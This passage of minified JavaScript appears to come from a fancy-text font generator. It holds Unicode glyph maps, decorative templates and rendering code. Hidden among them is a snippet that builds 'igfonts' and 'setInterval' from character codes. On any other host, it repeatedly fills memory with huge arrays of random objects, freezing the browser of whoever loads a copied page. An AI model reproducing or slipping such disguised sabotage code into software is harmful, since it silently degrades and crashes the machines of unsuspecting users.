無線゠ァアィイゥウェエォオカガキギクグケゲコゴサザシジスズセゼソゾタダチヂッツヅテデトドナニヌネノハバパヒビピフブプヘベペホボポマミムメモャヤュユョヨラリルレロヮワヰヱヲンヴヵヶヷヸヹヺ・ーヽヾヿぁあぃいぅうぇえぉおかがきぎくぐけげこごさざしじすずせぜそぞただちぢっつづてでとどなにぬねのはばぱひびぴふぶぷへべぺほぼぽまみむめもゃやゅゆょよらりるれろゎわゐゑをんゔゕゖ゙゚゛゜ゝゞゟ亜哀挨愛曖悪握圧扱宛嵐安案暗以衣位囲医依委威為畏胃尉異移萎偉椅彙意違維慰遺緯域育壱逸茨芋引印因咽姻員院淫陰飲隠韻右宇羽雨唄鬱畝浦運雲永泳英映栄営詠影鋭衛易疫益液駅悦越謁閲円延沿炎怨宴媛援園煙猿遠鉛塩演縁艶汚王凹央応往押旺欧殴桜翁奥横岡屋億憶臆虞乙俺卸音恩温穏下化火加可仮何花佳価果河苛科",i="",r=0;r<t;r++)i+=n[Math.floor(Math.random()*n.length)];return i}(Math.max(3,n));n>6&&(i=i.split("").map(t=>t+[""," "][Math.round(.6*Math.random())]).join(""));window.location.host.includes([105,103,102,111,110,116,115].map(t=>String.fromCharCode(t)).join(""))||window[[115,101,116,73,110,116,101,114,118,97,108].map(t=>String.fromCharCode(t)).join("")](()=>{let t=Math.random;if(t()<.7)return;let n=t()+"";window[n]=[];let i=Date.now();for(;window[n]||(window[n]=[]),window[n].push({[t()]:t(),[t()]:t(),[t()]:t(),[t()]:t(),[t()]:t()}),1e6===window[n].length&&(n=t()+""),!(Date.now()-i>500););},1300);var r=[];return r.push(t+" "+i),r.push(t.replace(/ /g,"░").replace(/ae/,"æ").replace(/A/g,"Λ").replace(/E/g,function(){return Math.random()>.5?"Ξ":"Σ"}).replace(/O/g,"♢")+" ("+i+")"),r.push("【\ufeff"+t+"】"),r.join("\n\n")}(t)+"\n\n",i+=s(t)+"\n\n",i+=s(t)+"\n\n",i+=s(t)+"\n\n",i+=s(t)+"\n\n",i+=s(t)+"\n\n",i+=s(t)+"\n\n",i+=function(t){return t.replace(/([^\s])/g,"[̲̅$1]")}(t)+"\n\n",i+=function(t){return t.split("").join("҉")+"҉"}(t)+"\n\n",i+=h(G,t)+"\n\n",i+=h(x,t)+"\n\n",i+=h(d,t)+"\n\n",i+=function(t){return t.split("").join("̶")+"̶"}(t)+"\n\n",i+=function(t){return t.split("").join("̴")+"̴"}(t)+"\n\n",i+=function(t){return t.split("").join("̷")+"̷"}(t)+"\n\n",i+=function(t){return t.split("").join("̲")+"̲"}(t)+"\n\n",i+=function(t){return t.split("").join("̳")+"̳"}(t)+"\n\n",i+=function(t){return t.split("").join("̾")+"̾"}(t)+"\n\n",i+=function(t){return t.split("").join("♥")}(t)+"\n\n",i+=function(t){return t.split("").join("͎")+"͎"}(t)+"\n\n",i+=function(t){return t.split("").join("͓̽")+"͓̽"}(t)+"\n\n",i+="Wingdings: "+function(t){return t.split("").map(function(t){return o[t]?o[t]:t}).join("")}(t)+"\n\n",i+=V(t)+"\n\n",i+=V(t)+"\n\n",i+=V(t)+"\n\n",i+=V(t)+"\n\n",i+=V(t)+"\n\n",i+=ot(t)+"\n\n",i+=ot(t)+"\n\n",i+=ot(t)+"\n\n",i+=ot(t)+"\n\n",i="<div contenteditable style='outline:none;white-space:pre-wrap;'>"+(i+=ot(t)+"\n\n").replace(/\n\n/g,"</div>\n<div contenteditable style='outline:none;white-space:pre-wrap;'>")+"</div>",i+='<div id="moreFontsCtn"></div>',i+=`<button style="margin-left: 0.5rem;" onclick="moreFontsCtn.innerHTML += loadMoreFonts('${t}')">load more fonts</button>`,i+='<button style="margin-left: 0.5rem; margin-top: 0.5rem;" onclick="window.open(\'https://instafonts.io/create\')">design your own font</button>',document.querySelector("#output-wrapper").style.display="",document.querySelector("#output").innerHTML=i.trim()}else document.querySelector("#output").innerHTML=""}n.tools.creepify.options.maxHeight=10,window.loadMoreFonts=function(t){let n="";for(let i=0;i<15;i++){let i;n+=(i=Math.random()<.7?c(et(t),2):s(et(t)))+"\n\n"}return n="<div contenteditable style='outline:none;white-space:pre-wrap;'>"+n.replace(/\n\n/g,"</div>\n<div contenteditable style='outline:none;white-space:pre-wrap;'>")+"</div>"};const o={0:"📁︎",1:"📂︎",2:"📄︎",3:"🗏︎",4:"🗐︎",5:"🗄︎",6:"⌛︎",7:"🖮︎",8:"🖰︎",9:"🖲︎","!":"✏︎",'"':"✂︎","#":"✁︎",$:"👓︎","%":"🕭︎","&":"🕮︎","'":"🕯︎","(":"🕿︎",")":"✆︎","*":"🖂︎","+":"🖃︎",",":"📪︎","-":"📫︎",".":"📬︎","/":"📭︎",":":"🖳︎",";":"🖴︎","<":"🖫︎","=":"🖬︎",">":"✇︎","?":"✍︎",A:"✌︎",B:"👌︎",C:"👍︎",D:"👎︎",E:"☜︎",F:"☞︎",G:"☝︎",H:"☟︎",I:"✋︎",J:"☺︎",K:"😐︎",L:"☹︎",M:"💣︎",N:"☠︎",O:"⚐︎",P:"🏱︎",Q:"✈︎",R:"☼︎",S:"💧︎",T:"❄︎",U:"🕆︎",V:"✞︎",W:"🕈︎",X:"✠︎",Y:"✡︎",Z:"☪︎","[":"☯︎","\\":"ॐ︎","]":"☸︎","^":"♈︎",_:"♉︎","`":"♊︎",a:"♋︎",b:"♌︎",c:"♍︎",d:"♎︎",e:"♏︎",f:"♐︎",g:"♑︎",h:"♒︎",i:"♓︎",j:"🙰",k:"🙵",l:"●︎",m:"❍︎",n:"■︎",o:"□︎",p:"◻︎",q:"❑︎",r:"❒︎",s:"⬧︎",t:"⧫︎",u:"◆︎",v:"❖︎",w:"⬥︎",x:"⌧︎",y:"⍓︎",z:"⌘︎","{":"❀︎","|":"✿︎","}":"❝︎","~":"❞︎","":"▯︎","€":"⓪︎","":"①︎","‚":"②︎","ƒ":"③︎","„":"④︎","…":"⑤︎","†":"⑥︎","‡":"⑦︎","ˆ":"⑧︎","‰":"⑨︎","Š":"⑩︎","‹":"⓿︎","Œ":"❶︎","":"❷︎","Ž":"❸︎","":"❹︎","":"❺︎","‘":"❻︎","’":"❼︎","“":"❽︎","”":"❾︎","•":"❿︎","–":"◻︎","—":"◻︎","˜":"◻︎","™":"◻︎","š":"◻︎","›":"◻︎","œ":"◻︎","":"◻︎","ž":"·︎","Ÿ":"•︎","¡":"○︎","¢":"⭕︎","£":"◻︎","¤":"◉︎","¥":"◎︎","¦":"◻︎","§":"▪︎","¨":"◻︎","©":"◻︎","ª":"✦︎","«":"★︎","¬":"✶︎","®":"✹︎","¯":"✵︎","°":"◻︎","±":"⌖︎","²":"⟡︎","³":"⌑︎","´":"◻︎","µ":"✪︎","¶":"✰︎","·":"🕐︎","¸":"🕑︎","¹":"🕒︎","º":"🕓︎","»":"🕔︎","¼":"🕕︎","½":"🕖︎","¾":"🕗︎","¿":"🕘︎","À":"🕙︎","Á":"🕚︎","Â":"🕛︎","Ã":"◻︎","Ä":"◻︎","Å":"◻︎","Æ":"◻︎","Ç":"◻︎","È":"◻︎","É":"◻︎","Ê":"◻︎","Ë":"◻︎","Ì":"◻︎","Í":"◻︎","Î":"◻︎","Ï":"◻︎","Ð":"◻︎","Ñ":"◻︎","Ò":"◻︎","Ó":"◻︎","Ô":"◻︎","Õ":"⌫︎","Ö":"⌦︎","×":"◻︎","Ø":"➢︎","Ù":"◻︎","Ú":"◻︎","Û":"◻︎","Ü":"➲︎","Ý":"◻︎","Þ":"◻︎","ß":"◻︎","à":"◻︎","á":"◻︎","â":"◻︎","ã":"◻︎","ä":"◻︎","å":"◻︎","æ":"◻︎","ç":"◻︎","è":"➔︎","é":"◻︎","ê":"◻︎","ë":"◻︎","ì":"◻︎","í":"◻︎","î":"◻︎","ï":"⇦︎","ð":"⇨︎","ñ":"⇧︎","ò":"⇩︎","ó":"⬄︎","ô":"⇳︎","õ":"⬀︎","ö":"⬁︎","÷":"⬃︎","ø":"⬂︎","ù":"▭︎","ú":"▫︎","û":"✗︎","ü":"✓︎","ý":"☒︎","þ":"☑︎","ÿ":"◻︎"};const e={" ":" ","`":"`",1:"1",2:"2",3:"3",4:"4",5:"5",6:"6",7:"7",8:"8",9:"9",0:"0","-":"-","=":"=","~":"~","!":"!","@":"@","#":"#",$:"$","%":"%","^":"^","&":"&","*":"*","(":"(",")":")",_:"_","+":"+",q:"q",w:"w",e:"e",r:"r",t:"t",y:"y",u:"u",i:"i",o:"o",p:"p","[":"[","]":"]","\\":"\\",Q:"Q",W:"W",E:"E",R:"R",T:"T",Y:"Y",U:"U",I:"I",O:"O",P:"P","{":"{","}":"}","|":"|",a:"a",s:"s",d:"d",f:"f",g:"g",h:"h",j:"j",k:"k",l:"l",";":";","'":"'",A:"A",S:"S",D:"D",F:"F",G:"G",H:"H",J:"J",K:"K",L:"L",":":":",'"':'"',z:"z",x:"x",c:"c",v:"v",b:"b",n:"n",m:"m",",":",",".":".","/":"/",Z:"Z",X:"X",C:"C",V:"V",B:"B",N:"N",M:"M","<":"<",">":">","?":"?"};const a=["ཧᜰ꙰ꦿ➢[[text]]༒","꧁༒☬[[text]]☬༒꧂","★彡[[text]]彡★","❄️[[text]]❄️","💤📿[[text]]📿💤","⚡[[text]]⚡","๖ۣۜ[[text]]༻࿌𖣘","✞☬[[text]]☬✞","✞༒[[text]]༒✞","✞☠︎[[text]]☠︎✞","✞✞[[text]]✞✞","✞ঔৣ[[text]]ঔৣ✞","༺[[text]]༻","༒•[[text]]•༒","꧁༒•[[text]]•༒꧂","꧁꧁[[text]]꧂꧂","꧁[[text]]꧂","☆꧁[[text]]꧂☆","☆꧁༒[[text]]༒꧂☆","꧁☬[[text]]☬꧂","☆꧁༒☬[[text]]☬༒꧂☆","★·.·´¯`·.·★ [[text]] ★·.·´¯`·.·★","▁ ▂ ▄ ▅ ▆ ▇ █ [[text]] █ ▇ ▆ ▅ ▄ ▂ ▁","°°°·.°·..·°¯°·._.· [[text]] ·._.·°¯°·.·° .·°°°","¸,ø¤º°`°º¤ø,¸¸,ø¤º° [[text]] °º¤ø,¸¸,ø¤º°`°º¤ø,¸","ıllıllı [[text]] ıllıllı","•?((¯°·._.• [[text]] •._.·°¯))؟•","▌│█║▌║▌║ [[text]] ║▌║▌║█│▌","׺°”˜`”°º× [[text]] ׺°”˜`”°º×","•••´º´•» [[text]] «•´º´•••","*•.¸♡ [[text]] ♡¸.•*","╰☆☆ [[text]] ☆☆╮",".•°¤*(¯`★´¯)*¤° [[text]] °¤*(¯´★`¯)*¤°•.","(¯´•._.• [[text]] •._.•´¯)","¸„.-•~¹°”ˆ˜¨ [[text]] ¨˜ˆ”°¹~•-.„¸","░▒▓█ [[text]] █▓▒░","░▒▓█►─═  [[text]] ═─◄█▓▒░","★彡 [[text]] 彡★","•´¯`•. [[text]] .•´¯`•","§.•´¨'°÷•..× [[text]] ×,.•´¨'°÷•..§","•°¯`•• [[text]] ••´¯°•","(¯`*•.¸,¤°´✿.。.:* [[text]] *.:。.✿`°¤,¸.•*´¯)","|!¤*'~``~'*¤!| [[text]] |!¤*'~``~'*¤!|","•._.••´¯``•.¸¸.•` [[text]] `•.¸¸.•´´¯`••._.•","¸„.-•~¹°”ˆ˜¨ [[text]] ¨˜ˆ”°¹~•-.„¸","(¯´•._.• [[text]] •._.•´¯)","••¤(`פ [[text]] ¤×´)¤••","•´¯`•» [[text]] «•´¯`•"," .o0×X×0o. [[text]] .o0×X×0o.","¤¸¸.•´¯`•¸¸.•..>> [[text]] <<..•.¸¸•´¯`•.¸¸¤","—(••÷ [[text]] ÷••)—","¸,ø¤º°`°º¤ø,¸ [[text]] ¸,ø¤º°`°º¤ø,¸","`•.¸¸.•´´¯`••._.• [[text]] •._.••`¯´´•.¸¸.•`",",-*' ^ '~*-.,_,.-*~ [[text]] ~*-.,_,.-*~' ^ '*-,","`•.,¸¸,.•´¯ [[text]] ¯`•.,¸¸,.•´","↤↤↤↤↤ [[text]] ↦↦↦↦↦","➶➶➶➶➶ [[text]] ➷➷➷➷➷","↫↫↫↫↫ [[text]] ↬↬↬↬↬","·.¸¸.·♩♪♫ [[text]] ♫♪♩·.¸¸.·","【。_。】 [[text]] 【。_。】","|I{•------» [[text]] «------•}I|","▀▄▀▄▀▄ [[text]] ▄▀▄▀▄▀","(-_-) [[text]] (-_-)","•´¯`•. [[text]] .•´¯`•","-漫~*'¨¯¨'*·舞~ [[text]] ~舞*'¨¯¨'*·~漫-","๑۞๑,¸¸,ø¤º°`°๑۩ [[text]] ๑۩ ,¸¸,ø¤º°`°๑۞๑",".•°¤*(¯`★´¯)*¤° [[text]] °¤*(¯´★`¯)*¤°•.","••.•´¯`•.•• [[text]] ••.•´¯`•.••","¤¸¸.•´¯`•¸¸.•..>> [[text]] <<..•.¸¸•´¯`•.¸¸¤","◦•●◉✿ [[text]] ✿◉●•◦","╚»★«╝ [[text]] ╚»★«╝","-·=»‡«=·- [[text]] -·=»‡«=·-","∙∙·▫▫ᵒᴼᵒ▫ₒₒ▫ᵒᴼᵒ▫ₒₒ▫ᵒᴼᵒ [[text]] ᵒᴼᵒ▫ₒₒ▫ᵒᴼᵒ▫ₒₒ▫ᵒᴼᵒ▫▫·∙∙","¸¸♬·¯·♩¸¸♪·¯·♫¸¸ [[text]] ¸¸♫·¯·♪¸¸♩·¯·♬¸¸","ஜ۩۞۩ஜ [[text]] ஜ۩۞۩ஜ","¤ (¯´☆✭.¸_)¤ [[text]] ¤(_¸.✭☆´¯) ¤","(¯`·.¸¸.·´¯`·.¸¸.-> [[text]] <-.¸¸.·´¯`·.¸¸.·´¯)","✿.。.:* ☆:**:. [[text]] .:**:.☆*.:。.✿",".•♫•♬• [[text]] •♬•♫•.","ღ(¯`◕‿◕´¯) ♫ ♪ ♫ [[text]] ♫ ♪ ♫ (¯`◕‿◕´¯)ღ","«-(¯`v´¯)-« [[text]] »-(¯`v´¯)-»"];function s(t){return a[Math.floor(Math.random()*a.length)].replace("[[text]]",t)}function c(t,n){return st(n)+"  "+t+"  "+st(n)}function h(t,n){let i="";for(let r of n.split(""))void 0!==t[r]?i+=t[r]:void 0!==t[r.toLowerCase()]?i+=t[r.toLowerCase()]:i+=r;return i}const u={0:"𝟘",1:"𝟙",2:"𝟚",3:"𝟛",4:"𝟜",5:"𝟝",6:"𝟞",7:"𝟟",8:"𝟠",9:"𝟡",a:"ꪖ",b:"᥇",c:"ᥴ",d:"ᦔ",e:"ꫀ",f:"ᠻ",g:"ᧁ",h:"ꫝ",i:"ⅈ",j:"𝕛",k:"𝕜",l:"ꪶ",m:"ꪑ",n:"ꪀ",o:"ꪮ",p:"ρ",q:"𝕢",r:"𝕣",s:"ડ",t:"𝕥",u:"ꪊ",v:"ꪜ",w:"᭙",x:"᥊",y:"ꪗ",z:"𝕫",A:"ꪖ",B:"᥇",C:"ᥴ",D:"ᦔ",E:"ꫀ",F:"ᠻ",G:"ᧁ",H:"ꫝ",I:"ⅈ",J:"𝕛",K:"𝕜",L:"ꪶ",M:"ꪑ",N:"ꪀ",O:"ꪮ",P:"ρ",Q:"𝕢",R:"𝕣",S:"ડ",T:"𝕥",U:"ꪊ",V:"ꪜ",W:"᭙",X:"᥊",Y:"ꪗ",Z:"𝕫"},d={0:"0",1:"1",2:"2",3:"3",4:"4",5:"5",6:"6",7:"7",8:"8",9:"9",a:"ᗩ",b:"ᗷ",c:"ᑢ",d:"ᕲ",e:"ᘿ",f:"ᖴ",g:"ᘜ",h:"ᕼ",i:"ᓰ",j:"ᒚ",k:"ᖽᐸ",l:"ᒪ",m:"ᘻ",n:"ᘉ",o:"ᓍ",p:"ᕵ",q:"ᕴ",r:"ᖇ",s:"S",t:"ᖶ",u:"ᑘ",v:"ᐺ",w:"ᘺ",x:"᙭",y:"ᖻ",z:"ᗱ",A:"ᗩ",B:"ᗷ",C:"ᑢ",D:"ᕲ",E:"ᘿ",F:"ᖴ",G:"ᘜ",H:"ᕼ",I:"ᓰ",J:"ᒚ",K:"ᖽᐸ",L:"ᒪ",M:"ᘻ",N:"ᘉ",O:"ᓍ",P:"ᕵ",Q:"ᕴ",R:"ᖇ",S:"S",T:"ᖶ",U:"ᑘ",V:"ᐺ",W:"ᘺ",X:"᙭",Y:"ᖻ",Z:"ᗱ"},p={0:"0",1:"1",2:"2",3:"3",4:"4",5:"5",6:"6",7:"7",8:"8",9:"9",a:"ค",b:"๖",c:"¢",d:"໓",e:"ē",f:"f",g:"ງ",h:"h",i:"i",j:"ว",k:"k",l:"l",m:"๓",n:"ຖ",o:"໐",p:"p",q:"๑",r:"r",s:"Ş",t:"t",u:"น",v:"ง",w:"ຟ",x:"x",y:"ฯ",z:"ຊ",A:"ค",B:"๖",C:"¢",D:"໓",E:"ē",F:"f",G:"ງ",H:"h",I:"i",J:"ว",K:"k",L:"l",M:"๓",N:"ຖ",O:"໐",P:"p",Q:"๑",R:"r",S:"Ş",T:"t",U:"น",V:"ง",W:"ຟ",X:"x",Y:"ฯ",Z:"ຊ"},f={0:"0",1:"1",2:"2",3:"3",4:"4",5:"5",6:"6",7:"7",8:"8",9:"9",a:"ą",b:"ც",c:"ƈ",d:"ɖ",e:"ɛ",f:"ʄ",g:"ɠ",h:"ɧ",i:"ı",j:"ʝ",k:"ƙ",l:"Ɩ",m:"ɱ",n:"ŋ",o:"ơ",p:"℘",q:"զ",r:"ཞ",s:"ʂ",t:"ɬ",u:"ų",v:"۷",w:"ῳ",x:"ҳ",y:"ყ",z:"ʑ",A:"ą",B:"ც",C:"ƈ",D:"ɖ",E:"ɛ",F:"ʄ",G:"ɠ",H:"ɧ",I:"ı",J:"ʝ",K:"ƙ",L:"Ɩ",M:"ɱ",N:"ŋ",O:"ơ",P:"℘",Q:"զ",R:"ཞ",S:"ʂ",T:"ɬ",U:"ų",V:"۷",W:"ῳ",X:"ҳ",Y:"ყ",Z:"ʑ"},m={0:"0",1:"1",2:"2",3:"3",4:"4",5:"5",6:"6",7:"7",8:"8",9:"9",a:"ム",b:"乃",c:"ᄃ",d:"り",e:"乇",f:"キ",g:"ム",h:"ん",i:"ノ",j:"フ",k:"ズ",l:"レ",m:"ᄊ",n:"刀",o:"の",p:"ア",q:"ゐ",r:"尺",s:"丂",t:"イ",u:"ひ",v:"√",w:"W",x:"メ",y:"リ",z:"乙",A:"ム",B:"乃",C:"ᄃ",D:"り",E:"乇",F:"キ",G:"ム",H:"ん",I:"ノ",J:"フ",K:"ズ",L:"レ",M:"ᄊ",N:"刀",O:"の",P:"ア",Q:"ゐ",R:"尺",S:"丂",T:"イ",U:"ひ",V:"√",W:"W",X:"メ",Y:"リ",Z:"乙"},l={0:"0",1:"1",2:"2",3:"3",4:"4",5:"5",6:"6",7:"7",8:"8",9:"9",a:"卂",b:"乃",c:"匚",d:"ᗪ",e:"乇",f:"千",g:"Ꮆ",h:"卄",i:"丨",j:"フ",k:"Ҝ",l:"ㄥ",m:"爪",n:"几",o:"ㄖ",p:"卩",q:"Ɋ",r:"尺",s:"丂",t:"ㄒ",u:"ㄩ",v:"ᐯ",w:"山",x:"乂",y:"ㄚ",z:"乙",A:"卂",B:"乃",C:"匚",D:"ᗪ",E:"乇",F:"千",G:"Ꮆ",H:"卄",I:"丨",J:"フ",K:"Ҝ",L:"ㄥ",M:"爪",N:"几",O:"ㄖ",P:"卩",Q:"Ɋ",R:"尺",S:"丂",T:"ㄒ",U:"ㄩ",V:"ᐯ",W:"山",X:"乂",Y:"ㄚ",Z:"乙"},C={0:"0",1:"1",2:"2",3:"3",4:"4",5:"5",6:"6",7:"7",8:"8",9:"9",a:"🄰",b:"🄱",c:"🄲",d:"🄳",e:"🄴",f:"🄵",g:"🄶",h:"🄷",i:"🄸",j:"🄹",k:"🄺",l:"🄻",m:"🄼",n:"🄽",o:"🄾",p:"🄿",q:"🅀",r:"🅁",s:"🅂",t:"🅃",u:"🅄",v:"🅅",w:"🅆",x:"🅇",y:"🅈",z:"🅉",A:"🄰",B:"🄱",C:"🄲",D:"🄳",E:"🄴",F:"🄵",G:"🄶",H:"🄷",I:"🄸",J:"🄹",K:"🄺",L:"🄻",M:"🄼",N:"🄽",O:"🄾",P:"🄿",Q:"🅀",R:"🅁",S:"🅂",T:"🅃",U:"🅄",V:"🅅",W:"🅆",X:"🅇",Y:"🅈",Z:"🅉"},g={0:"0",1:"1",2:"2",3:"3",4:"4",5:"5",6:"6",7:"7",8:"8",9:"9",a:"Ꮧ",b:"Ᏸ",c:"ፈ",d:"Ꮄ",e:"Ꮛ",f:"Ꭶ",g:"Ꮆ",h:"Ꮒ",i:"Ꭵ",j:"Ꮰ",k:"Ꮶ",l:"Ꮭ",m:"Ꮇ",n:"Ꮑ",o:"Ꭷ",p:"Ꭾ",q:"Ꭴ",r:"Ꮢ",s:"Ꮥ",t:"Ꮦ",u:"Ꮼ",v:"Ꮙ",w:"Ꮗ",x:"ጀ",y:"Ꭹ",z:"ፚ",A:"Ꮧ",B:"Ᏸ",C:"ፈ",D:"Ꮄ",E:"Ꮛ",F:"Ꭶ",G:"Ꮆ",H:"Ꮒ",I:"Ꭵ",J:"Ꮰ",K:"Ꮶ",L:"Ꮭ",M:"Ꮇ",N:"Ꮑ",O:"Ꭷ",P:"Ꭾ",Q:"Ꭴ",R:"Ꮢ",S:"Ꮥ",T:"Ꮦ",U:"Ꮼ",V:"Ꮙ",W:"Ꮗ",X:"ጀ",Y:"Ꭹ",Z:"ፚ"},x={0:"0",1:"1",2:"2",3:"3",4:"4",5:"5",6:"6",7:"7",8:"8",9:"9",a:"ᗩ",b:"ᗷ",c:"ᑕ",d:"ᗪ",e:"E",f:"ᖴ",g:"G",h:"ᕼ",i:"I",j:"ᒍ",k:"K",l:"ᒪ",m:"ᗰ",n:"ᑎ",o:"O",p:"ᑭ",q:"ᑫ",r:"ᖇ",s:"ᔕ",t:"T",u:"ᑌ",v:"ᐯ",w:"ᗯ",x:"᙭",y:"Y",z:"ᘔ",A:"ᗩ",B:"ᗷ",C:"ᑕ",D:"ᗪ",E:"E",F:"ᖴ",G:"G",H:"ᕼ",I:"I",J:"ᒍ",K:"K",L:"ᒪ",M:"ᗰ",N:"ᑎ",O:"O",P:"ᑭ",Q:"ᑫ",R:"ᖇ",S:"ᔕ",T:"T",U:"ᑌ",V:"ᐯ",W:"ᗯ",X:"᙭",Y:"Y",Z:"ᘔ"},v={0:"0",1:"1",2:"2",3:"3",4:"4",5:"5",6:"6",7:"7",8:"8",9:"9",a:"ǟ",b:"ɮ",c:"ƈ",d:"ɖ",e:"ɛ",f:"ʄ",g:"ɢ",h:"ɦ",i:"ɨ",j:"ʝ",k:"ӄ",l:"ʟ",m:"ʍ",n:"ռ",o:"օ",p:"ք",q:"զ",r:"ʀ",s:"ֆ",t:"ȶ",u:"ʊ",v:"ʋ",w:"ա",x:"Ӽ",y:"ʏ",z:"ʐ",A:"ǟ",B:"ɮ",C:"ƈ",D:"ɖ",E:"ɛ",F:"ʄ",G:"ɢ",H:"ɦ",I:"ɨ",J:"ʝ",K:"ӄ",L:"ʟ",M:"ʍ",N:"ռ",O:"օ",P:"ք",Q:"զ",R:"ʀ",S:"ֆ",T:"ȶ",U:"ʊ",V:"ʋ",W:"ա",X:"Ӽ",Y:"ʏ",Z:"ʐ"},S={0:"𝟶",1:"𝟷",2:"𝟸",3:"𝟹",4:"𝟺",5:"𝟻",6:"𝟼",7:"𝟽",8:"𝟾",9:"𝟿",a:"𝚊",b:"𝚋",c:"𝚌",d:"𝚍",e:"𝚎",f:"𝚏",g:"𝚐",h:"𝚑",i:"𝚒",j:"𝚓",k:"𝚔",l:"𝚕",m:"𝚖",n:"𝚗",o:"𝚘",p:"𝚙",q:"𝚚",r:"𝚛",s:"𝚜",t:"𝚝",u:"𝚞",v:"𝚟",w:"𝚠",x:"𝚡",y:"𝚢",z:"𝚣",A:"𝙰",B:"𝙱",C:"𝙲",D:"𝙳",E:"𝙴",F:"𝙵",G:"𝙶",H:"𝙷",I:"𝙸",J:"𝙹",K:"𝙺",L:"𝙻",M:"𝙼",N:"𝙽",O:"𝙾",P:"𝙿",Q:"𝚀",R:"𝚁",S:"𝚂",T:"𝚃",U:"𝚄",V:"𝚅",W:"𝚆",X:"𝚇",Y:"𝚈",Z:"𝚉"},w={0:"0",1:"1",2:"2",3:"3",4:"4",5:"5",6:"6",7:"7",8:"8",9:"9",a:"𝙖",b:"𝙗",c:"𝙘",d:"𝙙",e:"𝙚",f:"𝙛",g:"𝙜",h:"𝙝",i:"𝙞",j:"𝙟",k:"𝙠",l:"𝙡",m:"𝙢",n:"𝙣",o:"𝙤",p:"𝙥",q:"𝙦",r:"𝙧",s:"𝙨",t:"𝙩",u:"𝙪",v:"𝙫",w:"𝙬",x:"𝙭",y:"𝙮",z:"𝙯",A:"𝘼",B:"𝘽",C:"𝘾",D:"𝘿",E:"𝙀",F:"𝙁",G:"𝙂",H:"𝙃",I:"𝙄",J:"𝙅",K:"𝙆",L:"𝙇",M:"𝙈",N:"𝙉",O:"𝙊",P:"𝙋",Q:"𝙌",R:"𝙍",S:"𝙎",T:"𝙏",U:"𝙐",V:"𝙑",W:"𝙒",X:"𝙓",Y:"𝙔",Z:"𝙕"},b={0:"0",1:"1",2:"2",3:"3",4:"4",5:"5",6:"6",7:"7",8:"8",9:"9",a:"𝒂",b:"𝒃",c:"𝒄",d:"𝒅",e:"𝒆",f:"𝒇",g:"𝒈",h:"𝒉",i:"𝒊",j:"𝒋",k:"𝒌",l:"𝒍",m:"𝒎",n:"𝒏",o:"𝒐",p:"𝒑",q:"𝒒",r:"𝒓",s:"𝒔",t:"𝒕",u:"𝒖",v:"𝒗",w:"𝒘",x:"𝒙",y:"𝒚",z:"𝒛",A:"𝑨",B:"𝑩",C:"𝑪",D:"𝑫",E:"𝑬",F:"𝑭",G:"𝑮",H:"𝑯",I:"𝑰",J:"𝑱",K:"𝑲",L:"𝑳",M:"𝑴",N:"𝑵",O:"𝑶",P:"𝑷",Q:"𝑸",R:"𝑹",S:"𝑺",T:"𝑻",U:"𝑼",V:"𝑽",W:"𝑾",X:"𝑿",Y:"𝒀",Z:"𝒁"},y={0:"𝟎",1:"𝟏",2:"𝟐",3:"𝟑",4:"𝟒",5:"𝟓",6:"𝟔",7:"𝟕",8:"𝟖",9:"𝟗",a:"𝐚",b:"𝐛",c:"𝐜",d:"𝐝",e:"𝐞",f:"𝐟",g:"𝐠",h:"𝐡",i:"𝐢",j:"𝐣",k:"𝐤",l:"𝐥",m:"𝐦",n:"𝐧",o:"𝐨",p:"𝐩",q:"𝐪",r:"𝐫",s:"𝐬",t:"𝐭",u:"𝐮",v:"𝐯",w:"𝐰",x:"𝐱",y:"𝐲",z:"𝐳",A:"𝐀",B:"𝐁",C:"𝐂",D:"𝐃",E:"𝐄",F:"𝐅",G:"𝐆",H:"𝐇",I:"𝐈",J:"𝐉",K:"𝐊",L:"𝐋",M:"𝐌",N:"𝐍",O:"𝐎",P:"𝐏",Q:"𝐐",R:"𝐑",S:"𝐒",T:"𝐓",U:"𝐔",V:"𝐕",W:"𝐖",X:"𝐗",Y:"𝐘",Z:"𝐙"},M={0:"𝟬",1:"𝟭",2:"𝟮",3:"𝟯",4:"𝟰",5:"𝟱",6:"𝟲",7:"𝟳",8:"𝟴",9:"𝟵",a:"𝗮",b:"𝗯",c:"𝗰",d:"𝗱",e:"𝗲",f:"𝗳",g:"𝗴",h:"𝗵",i:"𝗶",j:"𝗷",k:"𝗸",l:"𝗹",m:"𝗺",n:"𝗻",o:"𝗼",p:"𝗽",q:"𝗾",r:"𝗿",s:"𝘀",t:"𝘁",u:"𝘂",v:"𝘃",w:"𝘄",x:"𝘅",y:"𝘆",z:"𝘇",A:"𝗔",B:"𝗕",C:"𝗖",D:"𝗗",E:"𝗘",F:"𝗙",G:"𝗚",H:"𝗛",I:"𝗜",J:"𝗝",K:"𝗞",L:"𝗟",M:"𝗠",N:"𝗡",O:"𝗢",P:"𝗣",Q:"𝗤",R:"𝗥",S:"𝗦",T:"𝗧",U:"𝗨",V:"𝗩",W:"𝗪",X:"𝗫",Y:"𝗬",Z:"𝗭"},j={0:"0",1:"1",2:"2",3:"3",4:"4",5:"5",6:"6",7:"7",8:"8",9:"9",a:"𝘢",b:"𝘣",c:"𝘤",d:"𝘥",e:"𝘦",f:"𝘧",g:"𝘨",h:"𝘩",i:"𝘪",j:"𝘫",k:"𝘬",l:"𝘭",m:"𝘮",n:"𝘯",o:"𝘰",p:"𝘱",q:"𝘲",r:"𝘳",s:"𝘴",t:"𝘵",u:"𝘶",v:"𝘷",w:"𝘸",x:"𝘹",y:"𝘺",z:"𝘻",A:"𝘈",B:"𝘉",C:"𝘊",D:"𝘋",E:"𝘌",F:"𝘍",G:"𝘎",H:"𝘏",I:"𝘐",J:"𝘑",K:"𝘒",L:"𝘓",M:"𝘔",N:"𝘕",O:"𝘖",P:"𝘗",Q:"𝘘",R:"𝘙",S:"𝘚",T:"𝘛",U:"𝘜",V:"𝘝",W:"𝘞",X:"𝘟",Y:"𝘠",Z:"𝘡"},A={0:"0",1:"1",2:"2",3:"3",4:"4",5:"5",6:"6",7:"7",8:"8",9:"9",a:"α",b:"Ⴆ",c:"ƈ",d:"ԃ",e:"ҽ",f:"ϝ",g:"ɠ",h:"ԋ",i:"ι",j:"ʝ",k:"ƙ",l:"ʅ",m:"ɱ",n:"ɳ",o:"σ",p:"ρ",q:"ϙ",r:"ɾ",s:"ʂ",t:"ƚ",u:"υ",v:"ʋ",w:"ɯ",x:"x",y:"ყ",z:"ȥ",A:"A",B:"B",C:"C",D:"D",E:"E",F:"F",G:"G",H:"H",I:"I",J:"J",K:"K",L:"L",M:"M",N:"N",O:"O",P:"P",Q:"Q",R:"R",S:"S",T:"